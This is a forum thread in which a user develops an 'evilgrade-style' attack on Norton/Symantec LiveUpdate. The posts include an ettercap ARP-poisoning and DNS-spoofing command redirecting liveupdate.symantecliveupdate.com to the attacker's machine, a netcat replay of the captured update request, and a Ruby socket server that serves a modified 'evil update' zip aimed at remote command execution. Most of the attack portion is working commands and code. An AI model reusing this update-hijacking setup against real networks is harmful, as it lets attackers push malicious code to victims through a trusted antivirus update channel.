Jump to content

Mitm Tcp Dump. Spoof Symantic Update.zip


i8igmac
 Share

Recommended Posts

Maybe I could get some ones opinion, I have captured a get request like /get symtec/id/dir/update.zip

I can reproduce this get request with ruby sockets and receive the binary data of the zip file. I saved this data and tried to extract its contents but it fails.

I hope to write my own evilgrade style exploit. Right now I'm on my Droid, I will post this get request and the binary data tonight. Any thoughts on how to properly handle this zip file please share

Link to comment
Share on other sites

Are you sure the zip downloaded properly? They may cancel it, if it doesn't use the same user agent symantec uses to download it with, and it also might need an authentication hash or cookie of some sort to allow the download to work properly.

Make sure you look at all the traffic with something like wireshark, and see what the request user agent is, if its a get or post, if it uses gzip encoding to download, etc, etc..

You could also just try navigating to the URL in your browser and see if it spits you the file.

Edited by digip
Link to comment
Share on other sites

ettercap, filter to drop encryption for more plain text... i fixed my problem with extracting the file ,-)

instead of pasting to text editor i just nc

netcat xxx.xxx.xx 80 > out.zip
GET /streaming/norton$202009$20streaming$20virus$20definitions_1.0_symalllanguages_livetri.zip HTTP/1.1.
If-Modified-Since: Sun, 08 May 2011 03:51:51 GMT.
Cache-control: max-age=0.
Cache-Control: no-cache.
Cache-Control: max-stale=0.
Cache-Control: min-fresh=1000.
Accept: */*.
HOST: liveupdate.symantecliveupdate.com.
User-Agent: +V2Ga/n+ZIRfedhlw5VItU2dHhkjA/GTQAAAAALUE.
Connection: Keep-Alive.

i open out.zip with text editor and removed the response header field from the top of the file and the file extracts just fine ,-)

i would really like to share more in-depth because this looks promising...

one of the files contents looks like this, one line

MOVE([TempDir],%StreamDefDir%)

i think this could give me sorta remote command execution

a quick test would be 'ping 192.168.1.101' (my labtop ip)

i found this log some one posted and now gives me a better view of whats going on... hxxp://community.norton.com/norton/attachments/norton/nis_feedback/92741/1/log.lu2.txt

Link to comment
Share on other sites

  • 2 weeks later...

here is a quick update on what i have done so far... i was going to make a video but i see no need... the client successfully downloads the modified zip file from my computer during the dns spoof (screenshot of wireshark) i just need to modify the zip packages contents to trigger execution...

sudo ettercap -T -F filter.ef -P dns_spoof -M arp // //

first thing is the ettercap filter drops encryption for more plaintext (not sure if its needed for this situation but i like to use it) 
dns_spoof: [liveupdate.symantecliveupdate.com] spoofed to [192.168.1.104]

sudo ruby exploit.rb

(its something i put together in a few minutes, dont judge me ,-P

require 'socket'            #SERVER
server = TCPServer.open(80)  
loop {                      
  client = server.accept    
  print client.read(100) #should recive /get /minitri.flg

  client.puts("HTTP/1.1 200 OK
Content-Length: 1
Content-Type: text/plain
Last-Modified: Fri, 29 Jul 2005 20:24:32 GMT
ETag: "+'"'+"1-42ea9080"+'"'+"
Accept-Ranges: bytes
Date: Sun, 15 May 2011 01:52:21 GMT
Connection: keep-alive
Cache-Control: public,must-revalidate,max-age=1800\n\r\n\r")

print client.read(100) #should recive GET /update symnetc from client

client.print("HTTP/1.1 200 OK
Content-Type: application/zip
Last-Modified: Sun, 15 May 2011 21:16:04 GMT
ETag: W/"+'"'+"15a1-4dd04294"+'"'+"
Accept-Ranges: bytes
Date: Sun, 15 May 2011 20:50:18 GMT
Connection: keep-alive
Cache-Control: public,must-revalidate,max-age=240\n\r\n\r")

#now send payload
	file = open('/home/bigmac/out.zip', "rb") # new evil update 
	fileContent = file.read
	client.print(fileContent)

  #client.print "Closing the connection. Bye!"
 # client.close                 # Disconnect from the client
}

wireshark screenshot of the zipfile downloaded 192.168.1.102 <---> 192.168.1.104

screenshotwireshark.png

img838.imageshack.us/i/screenshotwireshark.png

... i should post the zipfile, im sure all that is needed is changing a few numbers around to trigger execution

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...